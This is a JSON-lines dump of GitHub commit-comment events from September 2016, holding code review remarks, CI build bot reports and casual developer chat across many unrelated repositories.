{"id":"4525148693","type":"CommitCommentEvent","actor":{"login":"TPS"},"repo":{"name":"svn2github/nikkhokkho"},"payload":{"comment":{"id":18922387,"position":5,"line":161,"path":"FileOptimizer/Changelog.txt","commit_id":"bb2ce2039047fd5a0a4ea51b7d0c31b335e0efac","created_at":"2016-09-07T02:59:44Z","updated_at":"2016-09-07T02:59:44Z","body":"@javiergutierrezchamorro This should be Tidy 5.2.0 - http://www.html-tidy.org/ (https://github.com/htacg/tidy-html5)\r\nSf hasn't been the source repo in quite some time!"}},"created_at":"2016-09-07T02:59:44Z"}
{"id":"4529909757","type":"CommitCommentEvent","actor":{"login":"curlette"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18934734,"position":37,"line":322,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T20:00:26Z","updated_at":"2016-09-07T20:00:26Z","body":"I was thinking it made sense to first try running the guesser function as if it were the bdbcontrib/mml_utils guesser, then if that failed, to try running it as if it were the bayeslite guesser. My first instinct was to check the types of the parameters that the given guesser function takes in order to decide what to pass in (e.g. (bdb, table) vs. (column_names, rows)), but I had trouble figuring out how to do that."}},"created_at":"2016-09-07T20:00:26Z"}
{"id":"4529909812","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18934735,"position":null,"line":null,"path":null,"commit_id":"7f226366d1ae9cc37e63551e2d52a0bb10641d28","created_at":"2016-09-07T20:00:27Z","updated_at":"2016-09-07T20:00:27Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f226366d1ae9cc37e63551e2d52a0bb10641d28-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-07T20:00:27Z"}
{"id":"4529915679","type":"CommitCommentEvent","actor":{"login":"VeraV"},"repo":{"name":"creactiveconnect/observer"},"payload":{"comment":{"id":18934743,"position":12,"line":12,"path":"observer.beta1/observer_code/tytbyTAB.java","commit_id":"8cc62d579801c6cf71009e5bc07855a840c26443","created_at":"2016-09-07T20:01:26Z","updated_at":"2016-09-07T20:01:26Z","body":"Такого рода массив у тебя уже был объявлен в MainActivity. Старайся не дублировать код, особенно если ты вбиваешь какие-то значения так явно прописывая названия. Ибо это увеличивает шанс ошибки. Если код повторяется - вынеси в отдельный класс/файл/функцию и используй везде эту переменную. Когда тебе понадобится изменить что-то в одном массиве строк ты можешь забыть изменить во втором - и вот тебе головная боль в поисках косяка. Это тоже относится к хорошему стилю программирования - никакого дублирующегося кода."}},"created_at":"2016-09-07T20:01:26Z"}
{"id":"4529915723","type":"CommitCommentEvent","actor":{"login":"MJBWanela"},"repo":{"name":"MJBWanela/GeoWall"},"payload":{"comment":{"id":18934744,"position":null,"line":null,"path":null,"commit_id":"67a0ed969a2108ec09db2e0f0ebee88d2f90255d","created_at":"2016-09-07T20:01:27Z","updated_at":"2016-09-07T20:01:27Z","body":"adsf"}},"created_at":"2016-09-07T20:01:27Z"}
{"id":"4529916081","type":"CommitCommentEvent","actor":{"login":"MJBWanela"},"repo":{"name":"MJBWanela/GeoWall"},"payload":{"comment":{"id":18934745,"position":null,"line":null,"path":null,"commit_id":"67a0ed969a2108ec09db2e0f0ebee88d2f90255d","created_at":"2016-09-07T20:01:31Z","updated_at":"2016-09-07T20:01:31Z","body":"asdfadsfasdf"}},"created_at":"2016-09-07T20:01:31Z"}
{"id":"4529920734","type":"CommitCommentEvent","actor":{"login":"NaturalmotionStudios"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":18934754,"position":null,"line":null,"path":null,"commit_id":"062d35f0cf8b03ef23202eb3303cf61ed15c11cc","created_at":"2016-09-07T20:02:23Z","updated_at":"2016-09-07T20:02:23Z","body":"That's not the easter egg, it's\r\n```\r\n<!--\r\n _____                              _____                  \r\n |  __ \\                            |  __ \\                 \r\n | |  | |_ __ __ _  __ _  ___  _ __ | |  | |_ __ ___  _ __  \r\n | |  | | '__/ _` |/ _` |/ _ \\| '_ \\| |  | | '__/ _ \\| '_ \\ \r\n | |__| | | | (_| | (_| | (_) | | | | |__| | | | (_) | |_) |\r\n |_____/|_|  \\__,_|\\__, |\\___/|_| |_|_____/|_|  \\___/| .__/ \r\n                    __/ |                            | |    \r\n                   |___/                             |_|    \r\n -----------------------------------------------------------\r\n Hello there! Interested in helping DragonDrop? Ask us at\r\n moderation@dragondrops.net! Just peeking into the ol'\r\n source code? Start at <body> ;)\r\n -->```\r\n\r\nIt may look a little weird."}},"created_at":"2016-09-07T20:02:23Z"}
{"id":"4529928100","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18934773,"position":null,"line":null,"path":null,"commit_id":"2e2e2067f605001f3f8797bdbb253d3d003a4b17","created_at":"2016-09-07T20:03:44Z","updated_at":"2016-09-07T20:03:44Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ZjOgYpgqQgKsHbrnptxDiQ"}},"created_at":"2016-09-07T20:03:44Z"}
{"id":"4529928523","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18934774,"position":null,"line":null,"path":null,"commit_id":"2e2e2067f605001f3f8797bdbb253d3d003a4b17","created_at":"2016-09-07T20:03:49Z","updated_at":"2016-09-07T20:03:49Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#f-H71sa6RMiqD6i6GLRQSA"}},"created_at":"2016-09-07T20:03:49Z"}
{"id":"4529929283","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18934775,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:03:58Z","updated_at":"2016-09-07T20:03:58Z","body":"It's probably because of your non-usage of `cin >>`\r\nThere was a previous bug I fixed where it thought it was being given TWO commands, one valid and one invalid, and I somehow fixed it by using `cin >>` (hence the reason I recommend it)\r\n(Away from H drive, so can't test any bugs that compile)"}},"created_at":"2016-09-07T20:03:58Z"}
{"id":"4529930948","type":"CommitCommentEvent","actor":{"login":"bmneely"},"repo":{"name":"alexromo3rd/bloc-jams"},"payload":{"comment":{"id":18934777,"position":228,"line":72,"path":"scripts/album.js","commit_id":"58039cfaf7d515016cd26e8941816c382d98ea30","created_at":"2016-09-07T20:04:17Z","updated_at":"2016-09-07T20:04:17Z","body":"What happens if the element's grandparent has the `targetClass`? This line will cause us to bail out and never go to the grandparent."}},"created_at":"2016-09-07T20:04:17Z"}
{"id":"4529932055","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18934780,"position":null,"line":null,"path":null,"commit_id":"9f65ec252953872435c7e17badd6e49e8a188311","created_at":"2016-09-07T20:04:29Z","updated_at":"2016-09-07T20:04:29Z","body":"TeamCity libpalaso :: palaso-precise64-libpalaso-2.6 Continuous [Build 2.6.1095.9f65ec252953872435c7e17badd6e49e8a188311](http://build.palaso.org/viewLog.html?buildId=76550&buildTypeId=PalasoPrecise64v26Cont) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:07:01"}},"created_at":"2016-09-07T20:04:29Z"}
{"id":"4529933008","type":"CommitCommentEvent","actor":{"login":"brentpabst"},"repo":{"name":"DudeSolutions/DudeUnifiedApi"},"payload":{"comment":{"id":18934783,"position":null,"line":null,"path":null,"commit_id":"e8cdb7e0722c4db4469b79a8365dd5d4c2126ebf","created_at":"2016-09-07T20:04:41Z","updated_at":"2016-09-07T20:04:41Z","body":"__API Description file syntax error on line 92__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-07T20:04:41Z"}
{"id":"4529935026","type":"CommitCommentEvent","actor":{"login":"danlafreniere"},"repo":{"name":"danlafreniere/HackerRank"},"payload":{"comment":{"id":18934792,"position":null,"line":null,"path":null,"commit_id":"d3a4501932eaea58ca5de04c18cb916b500bd25e","created_at":"2016-09-07T20:05:06Z","updated_at":"2016-09-07T20:05:06Z","body":".DS_Store issue ** (not GitIgnore issue)"}},"created_at":"2016-09-07T20:05:06Z"}
{"id":"4529937881","type":"CommitCommentEvent","actor":{"login":"stakenschneider"},"repo":{"name":"stakenschneider/HexTetris"},"payload":{"comment":{"id":18934795,"position":null,"line":null,"path":null,"commit_id":"f9bbcf1833501482b23d8b7b39589b060a3acf54","created_at":"2016-09-07T20:05:37Z","updated_at":"2016-09-07T20:05:37Z","body":"\"я его удалил, чтобы он не портил картину\" - да ты чертов гений!\r\n\"Единственная оставшаяся проблема - фоновая музыка.\" - это не проблема, а фишка. Нам за нее только зачет и поставили.\r\n\r\np.s.  наивный мальчик, (шепотом) это далеко не единственная оставшаяся проблема.\r\np.p.s. орфографический фигляр! \"Наконец-то\" пишется через дефис... хе-хе"}},"created_at":"2016-09-07T20:05:37Z"}
{"id":"4529940811","type":"CommitCommentEvent","actor":{"login":"LuisPro"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18934802,"position":null,"line":null,"path":null,"commit_id":"0c21bc4bac87805a1f95c4d9c4a3b8a4ab5a890c","created_at":"2016-09-07T20:06:12Z","updated_at":"2016-09-07T20:06:12Z","body":"@peonso \r\nFine for me."}},"created_at":"2016-09-07T20:06:12Z"}
{"id":"4529945245","type":"CommitCommentEvent","actor":{"login":"madhuthorat"},"repo":{"name":"madhuthorat/nfs-ganesha"},"payload":{"comment":{"id":18934808,"position":null,"line":null,"path":null,"commit_id":"c7894920146528435490a25c32c8ead933bac367","created_at":"2016-09-07T20:07:02Z","updated_at":"2016-09-07T20:07:02Z","body":"Thank you for reviewing."}},"created_at":"2016-09-07T20:07:02Z"}
{"id":"4529946183","type":"CommitCommentEvent","actor":{"login":"aaschmitz"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18934809,"position":null,"line":null,"path":null,"commit_id":"5b96c3a5527c1b2989dbfbe625f1c763b8887334","created_at":"2016-09-07T20:07:13Z","updated_at":"2016-09-07T20:07:13Z","body":"Hi @reduz, this commit created the issue #6388 ;)"}},"created_at":"2016-09-07T20:07:13Z"}
{"id":"4529959219","type":"CommitCommentEvent","actor":{"login":"taddyb"},"repo":{"name":"taddyb/Database-Management"},"payload":{"comment":{"id":18934844,"position":null,"line":null,"path":null,"commit_id":"265ad4bddecdeac574155e8da2f2a3a805365a9c","created_at":"2016-09-07T20:09:43Z","updated_at":"2016-09-07T20:09:43Z","body":"Tadd Bindas, 9-7-16, Lab 1!"}},"created_at":"2016-09-07T20:09:43Z"}
{"id":"4529960023","type":"CommitCommentEvent","actor":{"login":"olafurtorfason"},"repo":{"name":"olafurtorfason/hello-world"},"payload":{"comment":{"id":18934848,"position":null,"line":null,"path":null,"commit_id":"833e32415e313f7a5c5bdac0bf85f66e0f3ff2c1","created_at":"2016-09-07T20:09:53Z","updated_at":"2016-09-07T20:09:53Z","body":"no02"}},"created_at":"2016-09-07T20:09:53Z"}
{"id":"4529963515","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18934857,"position":null,"line":null,"path":null,"commit_id":"9f65ec252953872435c7e17badd6e49e8a188311","created_at":"2016-09-07T20:10:31Z","updated_at":"2016-09-07T20:10:31Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.761.9f65ec252953872435c7e17badd6e49e8a188311](http://build.palaso.org/viewLog.html?buildId=76551&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:05:57"}},"created_at":"2016-09-07T20:10:31Z"}
{"id":"4529966259","type":"CommitCommentEvent","actor":{"login":"trevorackerman"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18934862,"position":6,"line":375,"path":"traffic_router/core/pom.xml","commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-07T20:10:58Z","updated_at":"2016-09-07T20:10:58Z","body":"What is the license of this library?\r\n\r\nWe're in the process of making Traffic Control and Apache Software Foundation project\r\nSo the license on this needs to be compatible with the Apache Software License 2.0\r\n\r\nhttp://www.apache.org/licenses/LICENSE-2.0.html"}},"created_at":"2016-09-07T20:10:58Z"}
{"id":"4529966467","type":"CommitCommentEvent","actor":{"login":"Kronos11"},"repo":{"name":"RealLifeMinistries/Rock"},"payload":{"comment":{"id":18934863,"position":null,"line":null,"path":null,"commit_id":"828910c2c32b4a087a3d395768cd9e8e2be7eae6","created_at":"2016-09-07T20:11:01Z","updated_at":"2016-09-07T20:11:01Z","body":"Yes! ran into this on a workflow and it caused quite a lot of confusion :) :+1: "}},"created_at":"2016-09-07T20:11:01Z"}
{"id":"4529973072","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit-models"},"payload":{"comment":{"id":18934880,"position":103,"line":106,"path":"1682/gas_male/gasmale.md","commit_id":"01dba51b21e7b02ce595eb42eb8cb82175082af2","created_at":"2016-09-07T20:12:17Z","updated_at":"2016-09-07T20:12:17Z","body":"This double dot might cause some problems..."}},"created_at":"2016-09-07T20:12:17Z"}
{"id":"4529978073","type":"CommitCommentEvent","actor":{"login":"staberas"},"repo":{"name":"staberas/Contract-Services"},"payload":{"comment":{"id":18934887,"position":null,"line":null,"path":null,"commit_id":"7875187d756fd315a35f4d9a598a68235e60ec04","created_at":"2016-09-07T20:13:13Z","updated_at":"2016-09-07T20:13:13Z","body":"This is a smart contract between individuals for services."}},"created_at":"2016-09-07T20:13:13Z"}
{"id":"4529981641","type":"CommitCommentEvent","actor":{"login":"haliphax"},"repo":{"name":"haliphax/x84"},"payload":{"comment":{"id":18934894,"position":null,"line":null,"path":null,"commit_id":"a3a186cfc9c89098cd8296173ad06fac6ab2a490","created_at":"2016-09-07T20:13:53Z","updated_at":"2016-09-07T20:13:53Z","body":"This change sent `lrzsz` up/download speeds into an acceptable range."}},"created_at":"2016-09-07T20:13:53Z"}
{"id":"4529989699","type":"CommitCommentEvent","actor":{"login":"nicholaspufal"},"repo":{"name":"PetroFeed/d3-selectable-gantt-chart"},"payload":{"comment":{"id":18934918,"position":6,"line":54,"path":"example/sample.json","commit_id":"487cdf29bcfce5f0f5cd0e0dc29dd80c625d680e","created_at":"2016-09-07T20:15:23Z","updated_at":"2016-09-07T20:15:23Z","body":"♘😶"}},"created_at":"2016-09-07T20:15:23Z"}
{"id":"4529990541","type":"CommitCommentEvent","actor":{"login":"thecapacity"},"repo":{"name":"18F/tock"},"payload":{"comment":{"id":18934920,"position":null,"line":null,"path":null,"commit_id":"e8996f12d0f07fe9158740d4d278ca7f46974f40","created_at":"2016-09-07T20:15:31Z","updated_at":"2016-09-07T20:15:31Z","body":"Wooho - I approve! Note this does change the default behavior from .1 hr increments to .25 hrs... FWIW :)"}},"created_at":"2016-09-07T20:15:31Z"}
{"id":"4529992694","type":"CommitCommentEvent","actor":{"login":"trevorackerman"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18934926,"position":40,"line":132,"path":"traffic_router/core/src/main/java/com/comcast/cdn/traffic_control/traffic_router/core/loc/Geolocation.java","commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-07T20:15:55Z","updated_at":"2016-09-07T20:15:55Z","body":"We'd highly prefer not to change the interface of high level classes like Geolocation.\r\nAlthough it's not a huge impact to implementing classes it looks like it did force a change to the MaxmindGeolocationService class.\r\n\r\nIt would be perfectly fine to add such an inner builder static class to the NetAcuityGeolocationService class\r\n\r\nAlso for the builder pattern you need to make the constructor private\r\n\r\nhttp://www.informit.com/articles/article.aspx?p=1216151&seqNum=2"}},"created_at":"2016-09-07T20:15:55Z"}
{"id":"4529993304","type":"CommitCommentEvent","actor":{"login":"stevengj"},"repo":{"name":"JuliaPy/PyCall.jl"},"payload":{"comment":{"id":18934928,"position":null,"line":null,"path":null,"commit_id":"869db2838fd0df0033fa6305d6ce72c9f65d5866","created_at":"2016-09-07T20:16:01Z","updated_at":"2016-09-07T20:16:01Z","body":"Yep, looking into that now."}},"created_at":"2016-09-07T20:16:01Z"}
{"id":"4529994729","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18934930,"position":null,"line":null,"path":null,"commit_id":"5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f","created_at":"2016-09-07T20:16:18Z","updated_at":"2016-09-07T20:16:18Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T20:16:18Z"}
{"id":"4530001500","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18934946,"position":null,"line":null,"path":null,"commit_id":"aaeb6a1593327a2b1968b149ed7758fc61fe3d55","created_at":"2016-09-07T20:17:34Z","updated_at":"2016-09-07T20:17:34Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-07T20:17:34Z"}
{"id":"4530010250","type":"CommitCommentEvent","actor":{"login":"bingbing8"},"repo":{"name":"PowerShell/PowerShell"},"payload":{"comment":{"id":18934959,"position":null,"line":null,"path":null,"commit_id":"0bad74b790b85098a7b4575147cd6ae0ab010e12","created_at":"2016-09-07T20:19:13Z","updated_at":"2016-09-07T20:19:13Z","body":"@lzybkr I updated the test based on your feedback to test the mac line ending via iex and generate ps files. Please review. thanks!"}},"created_at":"2016-09-07T20:19:13Z"}
{"id":"4530012700","type":"CommitCommentEvent","actor":{"login":"IIvec"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18934964,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T20:19:40Z","updated_at":"2016-09-07T20:19:40Z","body":"Congratulations!"}},"created_at":"2016-09-07T20:19:40Z"}
{"id":"4530020326","type":"CommitCommentEvent","actor":{"login":"elfmz"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":18934981,"position":null,"line":null,"path":null,"commit_id":"7c8e9c1c6dfe11d89ea5cfaa445333aab68d4cac","created_at":"2016-09-07T20:21:09Z","updated_at":"2016-09-07T20:21:09Z","body":"yep, plugin wants to see it, otherwise it treats it as codepage 866:) no BTW problem to change this default in code"}},"created_at":"2016-09-07T20:21:09Z"}
{"id":"4530021348","type":"CommitCommentEvent","actor":{"login":"AkhilRaja"},"repo":{"name":"AkhilRaja/PopularMovies"},"payload":{"comment":{"id":18934983,"position":6,"line":6,"path":"README.md","commit_id":"18dc689bef88e954cecb5c6158103e7f453eb2f8","created_at":"2016-09-07T20:21:19Z","updated_at":"2016-09-07T20:21:19Z","body":"Fixed"}},"created_at":"2016-09-07T20:21:19Z"}
{"id":"4530023394","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18934987,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:21:41Z","updated_at":"2016-09-07T20:21:41Z","body":"Alex, if you decide to go through with your plans of making a program to vote for [Alcoa vs Maryville](http://www.titansonline.com/fans/high-school-coach-of-the-week.html), then put it on GitHub, so that Zachary and I can see it.  Clearing the cache does work because I just tested it."}},"created_at":"2016-09-07T20:21:41Z"}
{"id":"4530025191","type":"CommitCommentEvent","actor":{"login":"trevorackerman"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18934991,"position":45,"line":45,"path":"traffic_router/core/src/main/java/com/comcast/cdn/traffic_control/traffic_router/core/loc/NetAcuityGeolocationService.java","commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-07T20:22:01Z","updated_at":"2016-09-07T20:22:01Z","body":"Can you provide background on the motivation for doing the extra work of specifying the data to be memory mapped instead of using the file system? Are there big performance differences? What additional items are driving this?"}},"created_at":"2016-09-07T20:22:01Z"}
{"id":"4530025364","type":"CommitCommentEvent","actor":{"login":"LuisValgoi"},"repo":{"name":"LuisValgoi/CenterSharingDevelopment"},"payload":{"comment":{"id":18934992,"position":null,"line":null,"path":null,"commit_id":"72fdfba4f099b1f919fddc45706d3e901bb58482","created_at":"2016-09-07T20:22:03Z","updated_at":"2016-09-07T20:22:03Z","body":"asfdasd"}},"created_at":"2016-09-07T20:22:03Z"}
{"id":"4530027025","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18934998,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T20:22:23Z","updated_at":"2016-09-07T20:22:23Z","body":"Impressive performance, congrats!"}},"created_at":"2016-09-07T20:22:23Z"}
{"id":"4530027843","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18935001,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T20:22:32Z","updated_at":"2016-09-07T20:22:32Z","body":"Congrats ajithcj :-)"}},"created_at":"2016-09-07T20:22:32Z"}
{"id":"4530028055","type":"CommitCommentEvent","actor":{"login":"trevorackerman"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18935003,"position":51,"line":51,"path":"traffic_router/core/src/main/java/com/comcast/cdn/traffic_control/traffic_router/core/loc/NetAcuityGeolocationService.java","commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-07T20:22:34Z","updated_at":"2016-09-07T20:22:34Z","body":"return a boolean, don't throw exceptions"}},"created_at":"2016-09-07T20:22:34Z"}
{"id":"4530029145","type":"CommitCommentEvent","actor":{"login":"trevorackerman"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18935005,"position":58,"line":58,"path":"traffic_router/core/src/main/java/com/comcast/cdn/traffic_control/traffic_router/core/loc/NetAcuityGeolocationService.java","commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-07T20:22:46Z","updated_at":"2016-09-07T20:22:46Z","body":"return a boolean, don't throw exceptions"}},"created_at":"2016-09-07T20:22:46Z"}
{"id":"4530029859","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935009,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:22:55Z","updated_at":"2016-09-07T20:22:55Z","body":"Wait... WHAT?\r\nWHAT?"}},"created_at":"2016-09-07T20:22:55Z"}
{"id":"4530032401","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935013,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:23:22Z","updated_at":"2016-09-07T20:23:22Z","body":"Maybe clearing cookies?"}},"created_at":"2016-09-07T20:23:22Z"}
{"id":"4530035598","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935018,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:23:57Z","updated_at":"2016-09-07T20:23:57Z","body":"Sorry, yeah I meant cookies."}},"created_at":"2016-09-07T20:23:57Z"}
{"id":"4530036346","type":"CommitCommentEvent","actor":{"login":"dubhater"},"repo":{"name":"pinterf/mvtools"},"payload":{"comment":{"id":18935022,"position":56,"line":114,"path":"Sources/DCTFFTW.cpp","commit_id":"e14739f56a1508724e2cba88af34f357acecdf28","created_at":"2016-09-07T20:24:05Z","updated_at":"2016-09-07T20:24:05Z","body":"It turns out that nearbyintf is really slow. Replacing the relevant lines with this should make MAnalyse with dct=1 some three times faster:\r\n``integ = _mm_cvtss_si32(_mm_set_ss(f));``\r\nThe result is the same.\r\n\r\nI wonder how the speed compares to the original x87 method."}},"created_at":"2016-09-07T20:24:05Z"}
{"id":"4530037224","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935027,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:24:15Z","updated_at":"2016-09-07T20:24:15Z","body":"So, clearing cookies doesn't work?"}},"created_at":"2016-09-07T20:24:15Z"}
{"id":"4530037896","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935029,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:24:23Z","updated_at":"2016-09-07T20:24:23Z","body":"It does work."}},"created_at":"2016-09-07T20:24:23Z"}
{"id":"4530038812","type":"CommitCommentEvent","actor":{"login":"vatbub"},"repo":{"name":"vatbub/hangman-solver"},"payload":{"comment":{"id":18935033,"position":null,"line":null,"path":null,"commit_id":"2220c00191a4bd3354a974be879d74fab12ff29e","created_at":"2016-09-07T20:24:33Z","updated_at":"2016-09-07T20:24:33Z","body":"See #21"}},"created_at":"2016-09-07T20:24:33Z"}
{"id":"4530039348","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18935034,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T20:24:40Z","updated_at":"2016-09-07T20:24:40Z","body":"Congrats. Great patch."}},"created_at":"2016-09-07T20:24:40Z"}
{"id":"4530039449","type":"CommitCommentEvent","actor":{"login":"vatbub"},"repo":{"name":"vatbub/hangman-solver"},"payload":{"comment":{"id":18935035,"position":null,"line":null,"path":null,"commit_id":"4b6204efe24226675801686721a2d75223a8912d","created_at":"2016-09-07T20:24:41Z","updated_at":"2016-09-07T20:24:41Z","body":"See #21"}},"created_at":"2016-09-07T20:24:41Z"}
{"id":"4530040096","type":"CommitCommentEvent","actor":{"login":"vatbub"},"repo":{"name":"vatbub/hangman-solver"},"payload":{"comment":{"id":18935041,"position":null,"line":null,"path":null,"commit_id":"fef35be62ae73a4d26a08bbcc9a2dc602de020b7","created_at":"2016-09-07T20:24:48Z","updated_at":"2016-09-07T20:24:48Z","body":"See #21"}},"created_at":"2016-09-07T20:24:48Z"}
{"id":"4530040726","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935043,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:24:56Z","updated_at":"2016-09-07T20:24:56Z","body":"Which is why it would be easy to make a program to vote for Alcoa vs. Maryville a lot."}},"created_at":"2016-09-07T20:24:56Z"}
{"id":"4530040967","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935044,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:24:59Z","updated_at":"2016-09-07T20:24:59Z","body":"Oh, does....\r\nHow is he going to implement it?\r\nSendkeys or Just JS."}},"created_at":"2016-09-07T20:24:59Z"}
{"id":"4530042486","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935049,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:25:16Z","updated_at":"2016-09-07T20:25:16Z","body":"I don't know how to clear cookies in JS.  Do you know how?"}},"created_at":"2016-09-07T20:25:16Z"}
